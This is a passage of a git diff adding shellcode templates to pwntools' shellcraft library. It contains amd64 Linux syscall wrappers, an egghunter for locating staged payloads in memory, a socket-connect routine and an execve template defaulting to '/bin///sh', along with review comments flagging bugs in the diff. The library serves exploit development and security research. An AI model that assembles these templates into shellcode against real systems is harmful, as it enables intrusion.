address} +if key in regs: + regctx['x2'] = key + key_pretty = 'x2' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${aarch64.setregs(regctx)} + add x0, x0, x1 +${start}: + ldr x3, [x1] + eor x3, x3, x2 + str x3, [x1] + add x1, x1, ${key_size} + cmp x1, x0 + blt ${start} diff --git a/pwnlib/shellcraft/templates/amd64/crash.asm b/pwnlib/shellcraft/templates/amd64/crash.asm new file mode 100644 index 000000000..69d1b7ecf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/crash.asm 
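Review bot: When `key` is not a register, `x2` is never initialised: `regctx` only receives an `'x2'` entry in the `if key in regs:` branch, yet the loop always executes `eor x3, x3, x2`, so an immediate key XORs the data with whatever `x2` happened to contain. Add the immediate to the register context, e.g. `regctx['x2'] = key if key in regs else key_int`. The loop also loads and stores 8 bytes (`ldr x3, [x1]` / `str x3, [x1]`) but advances `x1` by `key_size`, so for a 1/2/4-byte key the final iteration writes up to `8 - key_size` bytes past `address + count`; the access width should follow `key_size` (or the stride should be 8 with the key replicated). `word_name` and `key_pretty` are computed but unused, and the docstring's `'rsp'` example is amd64 text.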
@@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft.amd64 import popad %> +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + /* fill all registers with shit */ + ${popad()} + xor rsp, rsp /* especially esp */ + jmp rsp /* boom */ diff --git a/pwnlib/shellcraft/templates/amd64/itoa.asm b/pwnlib/shellcraft/templates/amd64/itoa.asm new file mode 100644 index 000000000..c61a33615 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/itoa.asm @@ -0,0 +1,60 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.amd64.mov('rax', 0xdeadbeef) + >>> sc += shellcraft.amd64.itoa('rax') + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='rsp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') +assert v in registers.amd64 +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='rsp': + sub rsp, 0x10 +%endif +## We need to know how long the string is, in order for +## the beginning of the string to be *exactly* at rsp. + ${mov('rdi', buffer)} + ${mov('rax', v)} + push rax /* save for later */ +${size_loop}: + ${mov('rdx', 0)} + ${mov('rcx', 10)} + div rcx + inc rdi + test rax, rax + jnz ${size_loop} + dec rdi +## Now we begin the actual division process + pop rax + ${itoa_loop}: + ${mov('rdx', 0)} +## rcx is already 10 + div rcx + add dl, ${ord('0')} + mov BYTE PTR [rdi], dl + dec rdi + test rax, rax + jnz ${itoa_loop} +## null terminate + ${mov('rdx', 0)} + mov BYTE PTR [rdi], dl + inc rdi 
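Review bot: The NUL terminator ends up one byte before the buffer rather than after the digits, if I trace `rdi` correctly: after `${size_loop}` and `dec rdi`, `rdi` points at the last digit slot, the digit loop decrements past the first slot, and the `null terminate` block then stores at `buffer - 1` before `inc rdi` restores `rdi` to `buffer`, so the doctest only sees `'3735928559\x00'` if the byte after the digits happens to be zero already. Write the terminator at `buffer + len` right after the size loop instead (sketch below), and note that `sub rsp, 0x10` reserves 16 bytes while a 64-bit value needs up to 20 digits plus NUL. The comment `/* atoi(...) */` should read `itoa`, the docstring's dangling `alloca` line should document `buffer` and `allocate_stack`, and `assert v in registers.amd64` contradicts the docstring's claim that `v` may be an integer constant.
```mako
    jnz ${size_loop}
## rdi == buffer + len: terminate here, then walk backwards over the digits
    ${mov('rdx', 0)}
    mov BYTE PTR [rdi], dl
    dec rdi
## Now we begin the actual division process
    pop rax
## … unchanged: ${itoa_loop} digit loop …
## rdi is now buffer - 1; restore it
    inc rdi
```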
diff --git a/pwnlib/shellcraft/templates/amd64/linux/accept.asm b/pwnlib/shellcraft/templates/amd64/linux/accept.asm new file mode 100644 index 000000000..5fe60c09b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/access.asm b/pwnlib/shellcraft/templates/amd64/linux/access.asm new file mode 100644 index 000000000..d55019a93 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/acct.asm b/pwnlib/shellcraft/templates/amd64/linux/acct.asm new file mode 100644 index 000000000..dbe8800e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/alarm.asm b/pwnlib/shellcraft/templates/amd64/linux/alarm.asm new file mode 100644 index 000000000..f38efa55f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/alarm.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/bind.asm b/pwnlib/shellcraft/templates/amd64/linux/bind.asm new file mode 100644 index 000000000..d7e090938 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/brk.asm b/pwnlib/shellcraft/templates/amd64/linux/brk.asm new file mode 100644 index 000000000..bf88acb97 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chdir.asm b/pwnlib/shellcraft/templates/amd64/linux/chdir.asm new file mode 100644 index 000000000..34d709077 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chmod.asm b/pwnlib/shellcraft/templates/amd64/linux/chmod.asm new file mode 100644 index 000000000..bc186ce01 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/amd64/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chown.asm b/pwnlib/shellcraft/templates/amd64/linux/chown.asm new file mode 100644 index 000000000..ce9906a5a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/chroot.asm b/pwnlib/shellcraft/templates/amd64/linux/chroot.asm new file mode 100644 index 000000000..ede746bb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm new file mode 100644 index 000000000..35e2dc07c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm new file mode 100644 index 000000000..2e7a3e3f9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm new file mode 100644 index 000000000..b7538fff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm b/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm new file mode 100644 index 000000000..6aad6ac54 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/clone.asm b/pwnlib/shellcraft/templates/amd64/linux/clone.asm new file mode 100644 index 000000000..a578200a9 
--- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/close.asm b/pwnlib/shellcraft/templates/amd64/linux/close.asm new file mode 100644 index 000000000..50358cf79 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/connect.asm b/pwnlib/shellcraft/templates/amd64/linux/connect.asm index d69d9bfb0..b5843acef 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/connect.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/connect.asm @@ -1,5 +1,8 @@ -<% from pwnlib.shellcraft import amd64 %> -<% from pwnlib.util.net import sockaddr %> +<% +from pwnlib.shellcraft.amd64 import pushstr +from pwnlib.shellcraft.amd64.linux import socket, syscall +from pwnlib.util.net import sockaddr +%> <%page args="host, port, network = 'ipv4'"/> <%docstring> 
@@ -11,13 +14,13 @@ sockaddr, addr_len, address_family = sockaddr(host, port, network) %>\ /* open new socket */ - ${amd64.linux.syscall('SYS_socket', address_family, 'SOCK_STREAM', 0)} - + ${socket(network)} + /* Put socket into rbp */ mov rbp, rax - + /* Create address structure on stack */ - ${amd64.pushstr(sockaddr, False)} - + ${pushstr(sockaddr, False)} + /* Connect the socket */ - ${amd64.linux.syscall('SYS_connect', 'rbp', 'rsp', addr_len)} + ${syscall('SYS_connect', 'rbp', 'rsp', addr_len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/creat.asm b/pwnlib/shellcraft/templates/amd64/linux/creat.asm new file mode 100644 index 000000000..c8846170c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/dup2.asm b/pwnlib/shellcraft/templates/amd64/linux/dup2.asm new file mode 100644 index 000000000..932b8d76e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/dup3.asm b/pwnlib/shellcraft/templates/amd64/linux/dup3.asm new file mode 100644 index 000000000..0b96aeb4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/dup3.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/echo.asm b/pwnlib/shellcraft/templates/amd64/linux/echo.asm index ac8ab0ac6..7ebddd573 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/echo.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/echo.asm @@ -1,5 +1,5 @@ <% from pwnlib.shellcraft import amd64 %> -<%page args="string, sock = 'rbp'"/> +<%page args="string, sock = '1'"/> <%docstring>Writes a string to a file descriptor ${amd64.pushstr(string, append_null = False)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm b/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm new file mode 100644 index 000000000..ccb0011af --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/egghunter.asm 
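Review bot: Changing the `sock` default from `'rbp'` to `'1'` is a behaviour change for every caller that relied on the old default after `connect()` left the socket in `rbp`, and the commit message does not mention it. If stdout is the intended default, `sock = 1` (an int) would be clearer than the string `'1'`, assuming the `mov` it feeds accepts both, and the docstring should state `sock (int, str): file descriptor or register to write to (default: stdout)`.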
@@ -0,0 +1,73 @@ +<% +from pwnlib.shellcraft import amd64, pretty, common +from pwnlib.util.packing import pack, unpack +from pwnlib.util.lists import group +from pwnlib import constants, log +%> +<%page args="egg, start_address = 0x7efc00000000, stride = 0x10000"/> +<%docstring> +egghunter(egg, start_address = 0) + +Searches memory for the byte sequence 'egg'. + +Return value is the address immediately following the match, +stored in RDI. + +Arguments: + egg(str, int): String of bytes, or word-size integer to search for + start_address(int): Where to start the search + +<% +egghunter_loop = common.label('egghunter_loop') +memcmp = common.label('egghunter_memcmp') +done = common.label('egghunter_done') +next_page = common.label('egghunter_nextpage') + +egg_str = egg +if isinstance(egg, int): + egg_str = pack(egg, bytes=4) + +if len(egg_str) % 4: + log = log.getLogger('pwnlib.shellcraft.templates.amd64.linux.egghunter') + log.error("Egg size must be a multiple of four bytes") +%> + cld + ${amd64.pushstr(egg_str, False)} +% if start_address: + ${amd64.mov('rbx', start_address)} +% endif + +## Search for pages +${egghunter_loop}: + ${amd64.linux.access('rbx', 0)} + +## EFAULT == Bad address + cmp al, (-${pretty(constants.EFAULT)}) & 0xff + jz ${next_page} + +## We found a page, scan all of the DWORDs + ${amd64.mov('rdx', 0x1000/4)} +${memcmp}: + test rdx, rdx + jz ${next_page} + +## Scan forward by DWORD + ${amd64.setregs({'rsi':'rsp', + 'rdi':'rbx', + 'rcx': len(egg_str)/4})} +## Success? + repe cmpsd + jz ${done} + +## Increment the starting point, decement the counter, restart + add rbx, 4 + dec rdx + jnz ${memcmp} + +${next_page}: +## Next page + or bx, 0xfff + inc rbx + jmp ${egghunter_loop} +${done}: + diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm new file mode 100644 index 000000000..9d49f65ec --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_create.asm 
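Review bot: The docstring header `egghunter(egg, start_address = 0)` does not match the page args (`start_address = 0x7efc00000000, stride = 0x10000`), and `stride` is never used in the body; either drop it or document what it is meant to control. Rebinding `log = log.getLogger(...)` inside the `if` replaces the imported `pwnlib.log` module with a logger object only on the error path, which is confusing; import `getLogger` at the top as the other templates do, e.g. `log = getLogger('pwnlib.shellcraft.templates.amd64.linux.egghunter')`. `len(egg_str)/4` and `0x1000/4` rely on Python 2 integer division; `//` makes the intent explicit.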
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm new file mode 100644 index 000000000..04b8deb4e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm new file mode 100644 index 000000000..b20cedcf0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm new file mode 100644 index 000000000..81647062d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_pwait.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm new file mode 100644 index 000000000..d6713c8fa --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/execve.asm b/pwnlib/shellcraft/templates/amd64/linux/execve.asm new file mode 100644 index 000000000..a479bdab9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/execve.asm 
@@ -0,0 +1,51 @@
+<%
+ from pwnlib.shellcraft import amd64, registers
+ from pwnlib.abi import linux_amd64_syscall as abi
+%>
+<%docstring>
+Execute a different process.
+
+Attempts to perform some automatic detection of types.
+Otherwise, the arguments behave as normal.
+
+- If ``path`` is a string that is not a known register,
+ it is pushed onto the stack.
+- If ``argv`` is an array of strings, it is pushed onto
+ the stack, and NULL-terminated.
+- If ``envp`` is an dictionary of {string:string},
+ it is pushed onto the stack, and NULL-terminated.
+
+Example:
+
+ >>> path = '/bin/sh'
+ >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS']
+ >>> envp = {'NAME': 'zerocool', 'STATUS': 3}
+ >>> sc = shellcraft.amd64.linux.execve(path, argv, envp)
+ >>> io = run_assembly(sc)
+ >>> io.recvall()
+ 'Hello, zerocool\n'
+ >>> io.poll(True)
+ 3
+
+<%page args="path = '/bin///sh', argv=[], envp={}"/>
+<%
+if isinstance(envp, dict):
+ envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
+
+args_reg = abi.register_arguments[2]
+env_reg = abi.register_arguments[3]
+%>
+% if isinstance(argv, (list, tuple)):
+ ${amd64.pushstr_array(abi.register_arguments[3], argv)}
+ <% argv = abi.register_arguments[3] %>
+% endif
+% if isinstance(envp, (list, tuple)):
+ ${amd64.pushstr_array(abi.register_arguments[2], envp)}
+ <% envp = abi.register_arguments[2] %>
+% endif
+% if isinstance(path, str) and not registers.is_register(path):
+ ${amd64.pushstr(path)}
+ <% path = 'rsp' %>
+%endif
+ ${amd64.syscall('SYS_execve', path, argv, envp)}
+
diff --git a/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm b/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm
new file mode 100644
index 000000000..50a33aac1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/faccessat.asm
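Review bot: `args_reg = abi.register_arguments[2]` and `env_reg = abi.register_arguments[3]` in the `<% %>` block of execve.asm are computed but never used, and the code beneath them places `argv` in `abi.register_arguments[3]` and `envp` in `abi.register_arguments[2]` — the reverse of what those names say — so a reader cannot tell whether the swap is deliberate (relying on `amd64.syscall` to shuffle the registers into the execve order) or a transposition; the abi module is not visible here, so I cannot confirm which index is rsi. Use the named locals consistently, e.g. `${amd64.pushstr_array(args_reg, argv)}` / `<% argv = args_reg %>` and `${amd64.pushstr_array(env_reg, envp)}` / `<% envp = env_reg %>`, or delete the two dead assignments. The docstring says `envp` is `{string:string}` while the example passes `'STATUS': 3`; since the `'%s=%s'` join accepts that, the docstring line could read `- If ``envp`` is a dictionary of {string: string-or-int}, ...`.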
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm b/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm new file mode 100644 index 000000000..bcd110fa5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm b/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm new file mode 100644 index 000000000..85df7f8e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm b/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm new file mode 100644 index 000000000..49c115279 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm b/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm new file mode 100644 index 000000000..2ee014875 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchown.asm b/pwnlib/shellcraft/templates/amd64/linux/fchown.asm new file mode 100644 index 000000000..4ece2907c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm b/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm new file mode 100644 index 000000000..40230d55b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm b/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm new file mode 100644 index 000000000..62e98b487 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/amd64/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm b/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm new file mode 100644 index 000000000..e8ae6eac6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/flock.asm b/pwnlib/shellcraft/templates/amd64/linux/flock.asm new file mode 100644 index 000000000..56a415024 --- 